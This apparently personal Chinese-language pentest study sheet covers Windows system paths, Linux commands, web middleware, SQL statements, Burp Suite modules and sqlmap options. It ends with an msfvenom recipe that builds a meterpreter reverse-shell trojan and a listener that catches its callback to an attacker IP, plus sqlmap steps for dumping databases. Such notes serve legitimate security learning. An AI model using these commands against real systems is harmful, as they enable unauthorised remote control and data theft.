1、常用windows路径
- 开机启动项:C:\Users\qyc\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup - 账户密码文件:C:\Windows\System32\config\SAM
- 解析域名:C:\Windows\System32\drivers\etc\hosts
2、操作系统
2.1、Linux系
- Linux–Redhat、Debian、SUSE
- Redhat–Centos
- Debian–Ubuntu
2.2、Unix系
- Unix–Freebsd、AIX、Solaris
3、Linux系统
3.1、Linux内核版本
- 版本号码:主版本号.稳定(偶)/开发版本(奇).发布号-patch号
3.2、文件目录类命令
- 浏览目录命令:cd、dir、ls
- 浏览文件命令:cat、more、less
- 目录操作命令:mkdir、rmdir
- 文件操作命令:touch、vi、rm、cp、mv、ln、tar、gzip、gunzip、whereis、whatis
4、中间件
4.1、JBoss
- JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB2.0和EJB3.0的规范,一般与Tomcat绑定使用
4.2、Tomcat
- Java应用服务器,用于处理JSP后台语言开发的应用,主要用于处理JSP动态网页
4.3、Weblogic
- Java EE企业基础架构平台,对业务内多种标准的全面支持,包括EJB、JSP、Servlet、JMS、JDBC、XML(标准通用标记语言的子集)和HTML
4.4、Apache
- Apache是Apache软件基金会的一个开放源代码的网页服务器软件,可以在大多数计算机操作系统中运行,由于其跨平台和安全性,被广泛使用,是最流行的Web服务器软件之一
4.5、Nginx
- Nginx是一款面向性能设计的HTTP服务器,小教育Apache、lighttpd具有占有内存少,稳定性高等优势
5、数据库增删改查
-
1、增:INSERT INTO 表名称 VALUES(值1,值2…)
例:INSERT into name VALUES(5,'qianyc');
-
2、删:DELETE FROM 表名称 WHERE 列名称=值
例:DELETE FROM name WHERE First_Name='qian';
-
3、改:UPDATE 表名称 SET 列名称=新值 WHERE 列名称=某值
例:UPDATE name SET First_Name='liu' WHERE First_Name='qian';
-
4、查:SELECT 列名称 FROM 表名称 WHERE 限定搜索范围
例:SELECT * FROM name WHERE First_Name='qian'
6、burpsuite模块
6.1、Intercepting Proxy
- Intercepting Proxy是针对web应用渗透测试工具的功能,代理功能
6.2、Intruder(爆破、枚举)
- Intruder是Burp中最受欢迎的工具,intruder是获取web应用信息的工具,它可以用来爆破、枚举,漏洞测试等任何你想要的用的测试手段,然后从结果中获取数据。
6.3、Repeater
- Repeater作为Burp中的一款手工验证HTTP消息的测试工具,通常用于多次重放请求响应和手工修改请求消息的修改后对服务器端响应的消息分析
7、sqlmap简介
7.1、sqlmap简介
7.1.1、定义
- sqlmap是一个由Python语言编写的开源渗透测试工具,它主要用来检测sql注入漏洞,是一款功能强大的sql漏洞检测利用工具
7.1.2、检测数据库
- access、mssql、mysql、oracle、postgresql、db2、sqlite等
7.1.3、功能
- sql盲注、union查询、显错查询、延迟注入、post注入、cookie注入等,执行命令、列出用户、检测权限、自动破解、数据导出等功能
7.2、sqlmap基本参数
-
sqlmap.py -h 查看帮助选项
-
is-dba 当前用户权限
-
dbs 所有数据库
-
tables 参数:列表名
-
columns 参数:列字段
-
dump 参数:下载数据
-
current-db 网站当前数据库
-
users 所有数据库用户
-
current-user 当前数据库用户
7.3、sqlmap思路
-
读取数据库 --dbs
-
读取表 -D XXX --tables
-
读取列 -D XXX -T XXX --columns
-
获取内容 -D XXX -T XXX -C xxx
8、msf制作木马
-
利用msfvenom创建木马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.10.51 LPORT=3311 -f elf > shell.elf
-
将木马复制到目标主机,并赋予u+x权限
-
攻击机打开msfconsole
-
使用以下模块
use exploit/multi/handler
-
设置payload
set payload linux/x64/meterpreter/reverse_tcp、
-
修改ip 端口
set lhost 192.168.10.51 set lport 3311
-
开始监听
run
-
目标主机执行shell.elf脚本
-
攻击机端监听已经获得权限